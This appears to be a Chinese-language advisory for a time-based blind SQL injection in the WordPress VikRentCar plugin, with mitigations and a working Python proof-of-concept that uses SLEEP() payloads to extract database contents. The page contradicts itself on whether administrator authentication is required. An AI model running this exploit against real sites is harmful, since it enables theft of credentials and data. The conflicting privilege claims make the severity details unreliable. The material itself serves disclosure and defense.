CVE-2025-13724 WordPress VikRentCar插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13724

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

VikRentCar Car Rental Management System plugin for WordPress

漏洞概述

CVE-2025-13724是WordPress平台下VikRentCar汽车租赁管理系统插件的一个高危安全漏洞。该漏洞是一种基于时间的盲注SQL注入攻击，存在于插件的'month'参数中，影响版本从初始版本到1.4.4。由于插件在处理用户输入的'month'参数时未进行充分的转义处理，且在构建SQL查询时缺乏足够的预处理机制，导致攻击者可以在原有SQL查询的基础上追加恶意的SQL语句。攻击者需要具有WordPress站点管理员级别或更高级别的访问权限才能成功利用此漏洞。通过构造特制的SQL payloads，攻击者可以利用时间延迟函数（如SLEEP()）来推断数据库信息，从而逐步提取数据库中的敏感信息，包括用户凭据、配置数据、业务数据等。此漏洞的CVSS评分为7.5，属于高危级别，机密性影响为高，完整性和可用性影响均为无。由于攻击复杂度低且无需用户交互，漏洞的实际威胁程度较高。建议所有使用该插件的WordPress站点管理员立即采取修复措施。

技术细节

VikRentCar插件的SQL注入漏洞位于admin/views/overv/view.html.php文件的第195行附近。在处理概览页面数据时，插件直接使用用户通过'month'参数提交的输入值构建SQL查询语句，而未对其进行严格的输入验证和转义处理。具体而言，当管理员访问插件的概览统计功能时，系统会根据请求中的'month'参数执行数据库查询以获取指定月份的租赁统计数据。由于SQL查询构建过程中使用了字符串拼接而非参数化查询，攻击者可以通过在'month'参数中注入恶意的SQL代码来实现盲注攻击。攻击者通常利用MySQL的SLEEP()函数结合条件判断语句（如IF()）来构造时间延迟 payloads。例如，注入类似IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)的payload可以根据页面响应时间判断数据库名称的首字符是否为'a'，从而逐步推断出完整的数据库名、表名、字段名及数据内容。这种攻击方式不需要直接回显数据，而是通过响应时间差异来获取信息，因此被称为基于时间的盲注。攻击者成功利用此漏洞后可以访问数据库中的所有敏感信息，包括WordPress用户的用户名和密码哈希值，从而可能导致整个网站被完全控制。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点管理员账户凭据或通过其他方式获得管理员级别会话

STEP 2

步骤2

攻击者构造包含SQL注入payload的'month'参数，利用时间延迟函数SLEEP()进行盲注测试

STEP 3

步骤3

通过观察不同payload对应的响应时间差异，攻击者逐步推断数据库名称、表名、字段名等结构信息

STEP 4

步骤4

基于获取的数据库结构，攻击者构造更精确的SQL注入语句提取敏感数据，如用户表中的用户名和密码哈希

STEP 5

步骤5

攻击者利用提取的凭据进一步控制WordPress站点或进行横向移动攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# CVE-2025-13724 PoC - Time-based Blind SQL Injection
# Target: WordPress VikRentCar plugin (<= 1.4.4)
# Parameter: month

target_url = "http://target-site.com/wp-admin/admin.php"
# Login with admin credentials to obtain session cookie
session = requests.Session()

def login(wordpress_url, username, password):
    """Authenticate to WordPress admin panel"""
    login_url = f"{wordpress_url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{wordpress_url}/wp-admin/"
    }
    response = session.post(login_url, data=data)
    return 'wordpress_logged_in' in session.cookies.get_dict()

def extract_data_via_blind_sql(wordpress_url):
    """Extract database name using time-based blind SQL injection"""
    # Construct malicious month parameter
    # Database name length detection
    length_payload = "1 AND IF(LENGTH(DATABASE())={length},SLEEP(5),0)---"
    
    # Character extraction payload
    char_payload = "1 AND IF(SUBSTRING(DATABASE(),{pos},1)='{char}',SLEEP(5),0)---"
    
    db_name = ""
    for pos in range(1, 20):  # Max length check
        for char in 'abcdefghijklmnopqrstuvwxyz0123456789_':
            payload = char_payload.format(pos=pos, char=char)
            params = {'page': 'vikrentcar', 'option': 'com_vikrentcar', 'task': 'overv', 'month': payload}
            
            start_time = time.time()
            response = session.get(wordpress_url + "/wp-admin/admin.php", params=params)
            elapsed = time.time() - start_time
            
            if elapsed >= 5:
                db_name += char
                print(f"[*] Extracted character: {char} | Current DB name: {db_name}")
                break
        else:
            break  # No more characters
    
    print(f"[+] Database name: {db_name}")
    return db_name

# Usage example
# login("http://target-site.com", "admin", "password")
# extract_data_via_blind_sql("http://target-site.com")

影响范围

VikRentCar Car Rental Management System plugin <= 1.4.4

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 暂时禁用VikRentCar插件直至完成升级；2) 限制访问wp-admin目录的IP范围，仅允许受信任的管理员IP访问；3) 监控Web服务器日志，查找包含SLEEP()、BENCHMARK()等时间延迟函数的异常请求；4) 启用Web应用防火墙（WAF）规则拦截可疑的SQL注入特征；5) 定期备份数据库以便在发生数据泄露时能够快速恢复。建议尽快评估并实施官方提供的安全更新。